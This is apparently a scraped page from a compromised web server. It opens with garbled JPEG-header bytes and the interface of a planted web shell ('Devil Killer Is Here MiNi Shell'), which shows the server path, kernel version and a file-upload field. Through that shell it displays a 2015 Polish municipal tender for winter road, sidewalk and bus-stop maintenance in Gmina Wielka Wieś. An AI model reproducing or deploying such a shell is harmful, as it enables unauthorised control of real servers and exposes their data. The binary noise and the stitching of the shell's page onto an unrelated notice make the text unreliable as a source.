JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150911/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150911/135083-N-2015.html

<p class="kh_header"><b>Wielka Wieś: Prowadzenie zimowego utrzymania dróg gminnych, chodników, parkingów, placów, wiat i peronów na terenie Gminy Wielka Wieś  w sezonie zimowym 2015/2016</b><br>
<b>Numer ogłoszenia: 135083 - 2015; data zamieszczenia: 11.09.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wielka Wieś , ul. Wesoła 48, 32-089 Wielka Wieś, woj. małopolskie, tel. 012 4191704, faks 012 4191705.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wielka-wies.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Prowadzenie zimowego utrzymania dróg gminnych, chodników, parkingów, placów, wiat i peronów na terenie Gminy Wielka Wieś  w sezonie zimowym 2015/2016.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest: Prowadzenie zimowego utrzymania dróg gminnych, chodników, parkingów, placów, wiat i peronów na terenie Gminy Wielka Wieś  w sezonie zimowym 20152016
1.1Zakres zamówienia obejmuje: 
1.1.1.Prowadzenie zimowego utrzymania pasa drogowego dróg gminnych, w sezonie zimowym 20152016 na terenie Gminy Wielka Wieś, którego celem jest zapewnienie przejezdności i płynności ruchu drogowego na drogach będących w zarządzie Gminy Wielka Wieś na terenie sołectw: Bębło, Będkowice, Biały Kościół, Czajowice, Giebułtów, Modlnica, Modlniczka, Prądnik Korzkiewski, Szyce, Tomaszowice, Wielka Wieś, Wierzchowie, w okresie zimowym tj. od dnia 15.10.2015 r. do dnia 15.04.2016 r. a w szczególności w czasie opadów śniegu, deszczu ze śniegiem lub gołoledzi.
Ponadto zakres usługi obejmuje :
przygotowanie sprzętu i materiałów niezbędnych do realizacji zadania poprzez : zakup, najem, magazynowanie, ładowanie i transport,
odśnieżanie jezdni i poboczy oraz obiektów towarzyszących - zatok autobusowych,usuwanie śliskości zimowej przez posypywanie nawierzchni drogi materiałami wykorzystywanymi do ich posypywania w czasie zimowego utrzymywania dróg,
dyżur sprzętu,
przekazywanie informacji o stanie dróg w formie meldunków do Zamawiającego 
zapewnienie łączności z pracującym lub dyżurującym sprzętem,
Wykaz dróg objętych zamówieniem przedstawia załącznik nr 1,2,3 do niniejszej SIWZ  oraz załączniki graficzne - mapy. 
1.1.2. Zimowe utrzymanie  ciągów pieszych - chodników, w sezonie zimowym 20152016 roku na obszarze Gminy Wielka Wieś, którego celem jest zapewnienie bezpieczeństwa, płynności przechodu i ruchu na ciągach pieszych, (chodnikach) będących w zarządzie Gminy Wielka Wieś w okresie zimowym tj. od dnia 15.10.2015 r. do dnia 15.04.2016r. a w szczególności w czasie opadów śniegu, deszczu ze śniegiem lub gołoledzi. 
Ogólna powierzchnia chodników objęta zimowym utrzymaniem -  33.840,74 m2  
(22560,5 mb x 1,50 m szerokość)
Zestawienie długości chodników na terenie Gminy Wielka Wieś planowanych do utrzymania w sezonie zimowym 201516
L.p.	Miejscowość	Ulica	Numer drogi	Długość
1.Bębło	ul. Zachodnia	K 601474	1580 mb
2.Biały Kościół	ul. Królowej Jadwigi, ul. Św. Floriana	K 601459 i K 601461	1060 mb
3.Czajowice	ul. Łokietka	K 601442	1593 mb
ul. Dworska	dz. nr 530	240 mb
4.Giebułtów	ul. Św. Idziego i ul. Podwikle	K 601447	2026 mb
5.Modlnica	ul. Św. Wojciecha	K 601479	1800 mb
ul. Kościelna	K 601444	750 mb
ul. Jurajska i ul. Bursztynowa	dz. nr 472 i 442	980 mb
ul. Przy Forcie	K 601445	143 mb
ul. Willowa (ślepy odcinek	K 601445	680 mb
ul. Krakowska + Centrum (ul. Faustyny, Pl. Norbertanek, ul. Dworska)	K 601445 i K 601450	1990 mb
ul. Kasztanowa	dz.nr 946	192 mb
ul. Willowa	K 601445	310 mb
ul. Słowiańska	K 601467	157,5 mb
6.Tomaszowice	ul. Ujazdowska	K 601444	1140 mb
ul. Krakowska	K 601444	1100 mb
7.Wielka-Wieś-Prądnik	ul. Wesoła	K 601448	1769 mb
8.Wielka Wieś	ul. Szkolna	K 601460	510 mb
ul. Słoneczna	dz. nr 479	1100 mb
ul. Centralna	K 601443	1540 mb
ul. Stroma	K 601443	1160 mb
9.Wierzchowie	ul. Spacerowa	K 601441	740 mb
Razem długość chodników : 22560,5 mb
1.1.3. Zimowe utrzymanie parkingów i placów gminnych w sezonie zimowym 20152016 roku na obszarze Gminy Wielka Wieś, którego celem jest zapewnienie bezpieczeństwa, płynności przechodu i ruchu na parkingach i placach będących w zarządzie Gminy Wielka Wieś w okresie zimowym tj. od dnia 15.10.2015 r. do dnia 15.04.2016r. a w szczególności w czasie opadów śniegu, deszczu ze śniegiem lub gołoledzi.
Ogólna powierzchnia parkingów i placów gminnych objęta zimowym utrzymaniem w sezonie zimowym 2015/16 -  1,6 ha  
Wykaz placów i parkingów planowanych  do utrzymania w sezonie zimowym 2015/2016 przedstawia poniższa tabela. 
L.p.	Miejscowość	Obiekt	Powierzchnia w ha
1.Bębło	Plac koło budynku komunalnego	0,05
2.Bębło	Plac koło kościoła	0,10
3.Będkowice	Plac w centrum	0,07
4.Biały Kościół	Plac koło cmentarza	0,18
5.Biały Kościół	Plac koło kościoła	0,12
6.Czajowice	Parking przy szkole	0,02
7.Giebułtów	Plac koło  budynku komunalnego	0,10
8.Modlnica	Plac w centrum i koło szkoły	0,08
9.Modlnica	Plac koło cmentarza	0,15
10.Modlniczka Plac koło  budynku komunalnego	0,09
11.Szyce	Parking koło ośrodka zdrowia	0,04
12.Tomaszowice	Plac w centrum	0,02
13.Wielka Wieś	Parking koło budynku komunalnego	0,02
14.Wielka Wieś	Plac koło UG	0,02
15.Wielka Wieś	Parking koło UG	0,06
16.Wierzchowie	Plac w centrum	0,04
RAZEM                                                                                                           1,16
1.1.4. Zimowe utrzymanie wiat i peronów komunikacji publicznej (przystanków autobusowych)  w sezonie zimowym 2015/2016 roku na obszarze Gminy Wielka Wieś, którego celem jest zapewnienie bezpieczeństwa ich użytkowników tj. od dnia 
1.12.2015 r. do dnia 28.02.2016 r. a w szczególności w czasie opadów śniegu, deszczu ze śniegiem lub gołoledzi.  
Wykaz  wiat i peronów objętych zimowym utrzymaniem przedstawia  załącznik nr 4 do niniejszej  SIWZ.
2. Standardy utrzymania:
2.1 Drogi :
W okresie od 15.10.2015r. do 15.04.2016r. 
45178  mb dróg utrzymanych całodobowo I  grupa (wykaz dróg przedstawia załącznik nr 1 do niniejszej SIWZ oraz załącznik graficzny - mapy) - drogi odśnieżane w pierwszej kolejności.
Standard utrzymania dróg obejmuje :
odśnieżanie i posypywanie jezdni: na skrzyżowaniach dróg, odcinkach o pochyleniu powyżej 4%, przystankach autobusowych, zakrętach, podjazdach.
30933 mb dróg utrzymanych całodobowo  II grupa (wykaz dróg przedstawia załącznik nr 2 do niniejszej SIWZ oraz załącznik graficzny - mapy) 
Standard utrzymania dróg obejmuje :
 odśnieżanie  i posypywanie jezdni z wykonaniem mijanek. Jezdnia posypywana na wzniesieniach i zakrętach 
 14195 mb dróg (wykaz dróg przedstawia załącznik nr 3 do niniejszej SIWZ) utrzymywanych całodobowo wg w/w zarządzenia - drogi zgłaszane na telefon 
Standard utrzymania dróg obejmuje :odśnieżanie  i posypywanie jezdni z wykonaniem mijanek. Jezdnia posypywana na wzniesieniach i zakrętach 
Do wyliczenia ceny oferty za całodobowe  utrzymywanie dróg zgłoszonych na telefon należy przyjąć 420 km dróg. Jest to ilość szacunkowa kilometrów dróg. Rozliczenie usługi następować będzie na podstawie faktycznie wykonanej i odebranej usługi . 
Drogi muszą zostać odśnieżone w sposób nie utrudniający włączenia się do odśnieżanej drogi z dróg przyległych w rejonie skrzyżowań 
Wykonawca przystępuje do odśnieżania lub posypywania nawierzchni drogi celem usunięcia jej śliskości w czasie do 90 minut (1,5 godziny) od wystąpienia zjawiska utrudniającego ruch na drodze. 
W przypadku dróg nie objętych ryczałtem, Wykonawca podejmuje zimowe ich utrzymanie po telefonicznym zgłoszeniu przez Zamawiającego. 
2.2.Ciągi Piesze (Chodniki )
Chodniki w przypadkach konieczności winny zostać odśnieżone i posypane  do godziny 700  
Chodniki muszą zostać odśnieżone  i posypane piaskiem lub kruszywem naturalnym bądź sztucznym (w przypadku powstania śliskości pośniegowej odkucie lodu) chodników, 
Chodniki, winny być odśnieżane i posypywane na całej (powierzchni) szerokości, 
W przypadku wystąpienia ciągłych (nieprzerwanych) opadów śniegu odśnieżanie chodników winno być prowadzone w taki sposób, aby była zapewniona drożność i bezpieczeństwo komunikacyjne na terenach objętych akcją
Odśnieżanie należy prowadzić mechanicznie przez zastosowanie lekkiego pługu lub w szczególnych przypadkach ręcznie. Zastosowana technologia nie może powodować uszkodzeń nawierzchni ciągów pieszych (chodników) oraz krawężników, obrzeży  oraz uzbrojenia przebiegającego pod chodnikami i w jego obrębie,
Śliskość musi być likwidowana poprzez posypywanie oczyszczonej  ze śniegu powierzchni materiałem uszorstniającym.
W przypadku wystąpienia opadów ciągłych musi być zachowana możliwość bezpiecznego poruszania się po chodnikach przez cały dzień.
2.3. Place i Parkingi 
Place i parkingi  w przypadkach konieczności winny zostać odśnieżone i posypane  
do godziny 700  
Place i parkingi muszą zostać odśnieżone  i posypane piaskiem lub kruszywem naturalnym bądź sztucznym (w przypadku powstania śliskości pośniegowej odkucie lodu) parkingów i placów 
Parkingi, place winny być odśnieżane i posypywane na całej (powierzchni) szerokości, 
W przypadku wystąpienia ciągłych (nieprzerwanych) opadów śniegu odśnieżanie parkingów i placów winno być prowadzone w taki sposób, aby była zapewniona drożność i bezpieczeństwo komunikacyjne na terenach objętych akcją,
Odśnieżanie należy prowadzić mechanicznie przez zastosowanie lekkiego pługu lub w szczególnych przypadkach ręcznie. Zastosowana technologia nie może powodować uszkodzeń nawierzchni parkingów i placów oraz krawężników, obrzeży  oraz uzbrojenia przebiegającego pod obiektem i w jego obrębie,
Śliskość musi być likwidowana poprzez posypywanie oczyszczonej  ze śniegu powierzchni materiałem uszorstniającym.
Przyjmuje się I lub II standard utrzymania placów i parkingów w okresie zimowym opisany w tabeli poniżej.
L.p.	Miejscowość	Obiekt	Częstotliwość	Powierzchnia w ha
1.Bębło	Plac koło budynku komunalnego	I standard	0,05
2.Bębło	Plac koło kościoła	II standard	0,10
3.Będkowice	Plac w centrum	I standard	0,07
4.Biały Kościół	Plac koło cmentarza	II standard 	0,18
5.Biały Kościół	Plac koło kościoła	I standard	0,12
6.Czajowice	Parking przy szkole	I standard	0,02
7.Giebułtów	Plac koło budynku komunalnego	II standard	0,10
8.Modlnica	Plac w centrum i koło szkoły	I standard	0,08
9.Modlnica	Plac koło cmentarza	II standard	0,15
10.Modlniczka	Plac koło budynku komunalnego	I standard	0,09
11.Szyce	Parking koło ośrodka zdrowia	I standard	0,04
12.Tomaszowice	Plac w centrum	I standard	0,02
13.Wielka Wieś	Parking koło budynku komunalnego	I standard	0,02
14.Wielka Wieś	Plac koło UG	I standard	0,02
15.Wielka Wieś	Parking koło UG	I standard	0,06
16.Wierzchowie	Plac w centrum	I standard	0,04
RAZEM	1,16
UWAGA!!
I standard - utrzymywane codziennie
II standard - utrzymywane w weekendy(soboty, niedziele), święta oraz sporadycznie po telefonicznym zgłoszeniu takiej potrzeby przez Zamawiającego w wyjątkowych sytuacjach.
2.4 Wiaty i perony (przystanki autobusowe) 
W okresie od 1.12.2015 do 28.12.2016r. 
Wiaty i perony w przypadkach konieczności winny zostać odśnieżone i posypane 
 do godziny 700  
W przypadku wystąpienia opadów ciągłych musi być zachowana możliwość bezpiecznego poruszania się po peronie oraz zachowana bezpieczna możliwość korzystania z komunikacji publicznej (wsiadanie i wysiadanie z pojazdów obsługiwanych przez peron) .
Perony musza być odśnieżane i posypane piaskiem lub kruszywem naturalnym bądź sztucznym (w przypadku powstania śliskości pośniegowej odkucie lodu) peronów
Perony winny być odśnieżane i posypywane na całej (powierzchni) szerokości, 
W przypadku wystąpienia ciągłych (nieprzerwanych) opadów śniegu odśnieżanie peronów winno być prowadzone w taki sposób, aby była zapewniona drożność i bezpieczeństwo komunikacyjne na terenach objętych akcją,
Zastosowana technologia utrzymania zimowego peronów nie może powodować uszkodzeń nawierzchni krawężników, obrzeży  
Śliskość musi być likwidowana poprzez posypywanie oczyszczonej  ze śniegu powierzchni materiałem uszorstniającym.
3. Wymagania dotyczące użytych materiałów do zwalczania śliskości 
3.1.Do likwidacji oblodzeń Wykonawca posypuje nawierzchnię dróg, chodników, parkingów placów  materiałami do posypywania  dopuszczonymi do ogólnego stosowania.
3.2.Materiał ten winien posiadać stosowne atesty potwierdzające jego przydatność do wykonania przedmiotu zamówienia.
3.3 Wymagania dla materiałów do zwalczania śliskości zimowej :
Użyte materiały winny być zgodne z Rozporządzeniem Ministra Środowiska z dnia 27 października 2005 roku w sprawie rodzajów i warunków stosowania środków, jakie mogą być używane na drogach publicznych oraz ulicach i placach (Dz. U. z dnia 24 listopada 2005 roku Nr 230 poz. 1960 z póżn. zm.)
Stosować do uszorstnienia lodu, zlodowaciałego i ubitego śniegu:
piasek o uziarnieniu do 1mm, 
 kruszywo naturalne lub sztuczne o uziarnieniu do 4 mm;
kruszywo kamienne łamane o uziarnieniu 2-4 mm, 
Kruszywo stosowane do uszorstnienia nawierzchni nie powinno być łamliwe, nie powinno zawierać zanieczyszczeń ilastych, gliniastych. Jednorodność uziarnienia kruszywa zapewnia większą równomierność pokrycia drogi podczas posypywania.
3.4.Nie dopuszcza się stosowania materiałów uszorstniajacych nienormatywnych w tym materiałów stanowiących odpad w rozumieniu ustawy o odpadach (w szczególności popiołu piecowego )
3.5. Typ zastosowanego materiału do zwalczania śliskości zimowej oraz materiału uszorstniającego przed sezonem zimowym będzie ustalony i zatwierdzony w formie protokołu najpóźniej w dniu podpisania umowy.
4 Obowiązki Wykonawcy 
4.1.Wykonawca decyduje o wyjeździe sprzętu na drogi, chodniki, place, parkingi, perony   po wcześniejszym przeanalizowaniu i zgłoszeniu takiej konieczności rozpoczęcia akcji zimowego utrzymania dróg, chodników placów, parkingów, peronów  do Zamawiającego w formie meldunku.
4.2.Wykonawca zorganizuje dyżury dyspozytorskie celem zapewnienia koordynacji i nadzoru akcji zimowej,
4.3.Wykonawca zabezpieczy przez cały okres prac sprzęt gwarantujący bezawaryjne
odśnieżanie i posypywanie ciągów pieszych,
4.4.Wykonawca rozpocznie odśnieżanie i  usuwanie śliskości po wystąpieniu opadów lub powstaniu śliskości, jednak nie później niż w ciągu 90 min. (1,5  godziny) od wystąpienia zjawiska.
4.5.Wykonawca zabezpieczy bazę materiałową niezbędną do przeprowadzenia akcji zima,
 4.6.Wykonawca będzie pozyskiwał  ze stacji meteorologicznej codziennie informacje o stanie pogody i będzie przekazywał je Zamawiającemu,
4.7.Wykonawca wyposaży pojazdy biorące udział w akcji zimowej w urządzenia wymagane przepisami ustawy Prawo o ruchu drogowym,
4.8. Wykonawca zakupi na własny koszt  piasek lub kruszywo ,
4.9.Wykonawca będzie utrzymywał wiaty przystankowe w szczególności ich oszklenia w stanie przejrzystości  poprzez oczyszczenie szyb wiat w okresie zimowym ze śniegu, błota pośniegowego w sytuacji takiej konieczności lub na wezwanie Zamawiającego, 
4.10.Wykonawca ponosi pełną odpowiedzialność za szkody w tym wypadki i kolizje drogowe spowodowane zaniechaniem robót lub na skutek niedostatecznego lub niezgodnego z obowiązującymi przepisami wykonywania robót przy zimowym utrzymaniu dróg, chodników parkingów i placów.
4.11. Wykonawca wykupi stosowną polisę ubezpieczeniową na kwotę:
nie mniejszą niż 300 tys. zł jako zabezpieczenie dla ewentualnych roszczeń tytułem poniesionych strat przez użytkowników dróg gminnych,  
 nie mniejszą niż  100 tys. złotych jako zabezpieczenie dla ewentualnych roszczeń tytułem poniesionych strat przez użytkowników chodników, placów i parkingów. 
 nie mniejszą niż 100 tys. złotych jako zabezpieczenie dla ewentualnych roszczeń tytułem poniesionych strat przez użytkowników wiat i peronów 
4.12.Wykonawca musi być dyspozycyjny całą dobę oraz musi posiadać łączność z operatorami  sprzętu.
4.13.Wykonawca zobowiązany jest do wyposażenia pojazdów przeznaczonych do wykonywania zamówienia w system kontroli GPS umożliwiający kontrolę poruszania się pojazdów  po terenie Gminy w trakcie realizowania usługi związanej z przedmiotem zamówienia.
4.14.Wykonawca przed podpisaniem umowy przedłoży Zamawiającemu stosowne kody  umożliwiające kontrolę pojazdów poprzez GPS. Karty pracy określać będą nazwę drogi objętej zamówieniem, rodzaj pracy (odśnieżanie, odśnieżanie z posypywaniem, posypywanie) czas wykonania pracy, ilość wykonanych kilometrów. Brak karty pracy będzie podstawą niezapłacenia przez Zamawiającego wynagrodzenia za okres na który karta pracy miała zostać wystawiony.
4.15.Wykonawca jest zobowiązany do posiadania takiej ilości sprzętu aby móc prowadzić akcję zimową na obszarze wskazanego terenu gminy objętego przetargiem oraz bazy  sprzętowo - materiałowej zlokalizowanej na terenie Gminy Wielka Wieś. Stosowny sprzęt nie powinien powodować uszkodzeń  nawierzchni odśnieżanych obiektów  oraz nie powinien stwarzać  zagrożenia dla użytkowników.
5. Płatności 
5.1.W okresie od 15.10.2015 r. do 30.11.2015 r. oraz od dnia 01.03.2016 r. do dnia 15.04.2016 r. :76111 mb dróg utrzymanych całodobowo I i II grupa  (wykaz dróg przedstawia załącznik nr 1,2 do niniejszej SIWZ oraz załącznik graficzny - mapy)
chodniki, parkingi i  place  
płatne ryczałtowo przy czym wartość ryczałtu wynosi 40% ceny podanej w ofercie za utrzymanie dróg, chodników, placów i parkingów  o których mowa w pkt 5.2:
5.2.W okresie od 01.12.2015 r. do 28.02.2016 r.  
 76111 mb dróg utrzymanych całodobowo I i II grupa (wykaz dróg przedstawia załącznik nr 1,2 do niniejszej SIWZ oraz załącznik graficzny - mapy)
 chodniki, parkingi i  place  
 wiaty, perony ( przystanki autobusowe) 
płatne ryczałtowo w pełnej wysokości określonej w ofercie za utrzymanie dróg, chodników placów i parkingów,  wiat, peronów.
5.3. W okresie od 15.10.2015r. do 15. 04.2016 r. 
14195 mb dróg (wykaz dróg przedstawia załącznik nr 3 do niniejszej SIWZ) utrzymywanych całodobowo wg w/w zarządzenia
płatne za 1 km utrzymywania dróg  (odśnieżania, odśnieżania z posypywaniem, posypywania materiałem uszorstniającym) drogi - po telefonicznym zgłoszeniu zlecającego:
5.4. Wynagrodzenie miesięczne ryczałtowe wypłacane będzie Wykonawcy za wykonanie zamówienia, o którym mowa w punkcie 5.1 oraz punkcie 5.2 . Rozliczenie robót o których mowa w pkt. 5.3 następować będzie na podstawie faktycznie wykonanej i odebranej usługi.  
6. Pozostałe wymagania
6.1.Ilość kilometrów dróg objęta przetargiem w szczególności określona w załączniku nr 3 do niniejszej SIWZ jest wielkością  przybliżoną (przewidywaną) i może ulec zmniejszeniu lub zwiększeniu w zależności od potrzeb i wysokości środków posiadanych przez Zamawiającego.
6.2.Zamawiający nie pokrywa kosztów dojazdu pracowników, sprzętu i materiałów eksploatacyjnych na teren Gminy Wielka Wieś, a jedynie cenę ryczałtową za wykonanie zimowego utrzymania dróg.
6.3.Odbiór robót odbywać się będzie na podstawie kontroli dróg przez Inspektora Urzędu Gminy Wielka Wieś oraz potwierdzonych kart pracy generowany przez system internetowego monitoringu pojazdów.
6.4. Zamawiający zastrzega sobie możliwość zmiany powyższego zakresu zamówienia lub zaniechania odśnieżania jednakże może to mieć miejsce jedynie po pisemnym powiadomieniu Wykonawcy o tym fakcie..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa 
w art. 67 ust. 1 pkt 6 ustawy Prawo zamówień publicznych stanowiących nie więcej niż 50% wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.21.20.00-6, 90.21.30.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.04.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wadium w kwocie 7 tys. złotych</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca wykaże wykonanie w okresie ostatnich trzech lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy w tym okresie co najmniej 2 usługi zimowego utrzymania dróg o długości minimum 50 km w jednym sezonie zimowym.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca wykażę, że dysponuje min.: 4 samochodami ciężarowymi o dopuszczalnej masie całkowitej do 15t z napędem 4x4 z pługiem i piaskarką, 2 ciągnikami 4 x 4 z pługiem i rozrzutnikiem, 2 ciągnikami o dopuszczalnej masie całkowitej do  1200 kg., 2 koparko-ładowarkami i 1 pługiem wirnikowym, 1 samochodem patrolowym 4 x 4</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca wykaże dysponowanie minimum: 2 osobami posiadającymi uprawnienia do kierowania ruchem drogowym i 4 osoby posiadające uprawnienia do prowadzenia pojazdów przeznaczonych do mechanicznego odśnieżania dróg  odśnieżarkami mechanicznymi zgodnie z Rozporządzeniem Ministra Gospodarki z dnia 20.09.2001r. w sprawie bezpieczeństwa i higieny pracy( Dz. U. nr 118, poz.1263)</p>
</li></ul></li></ul>
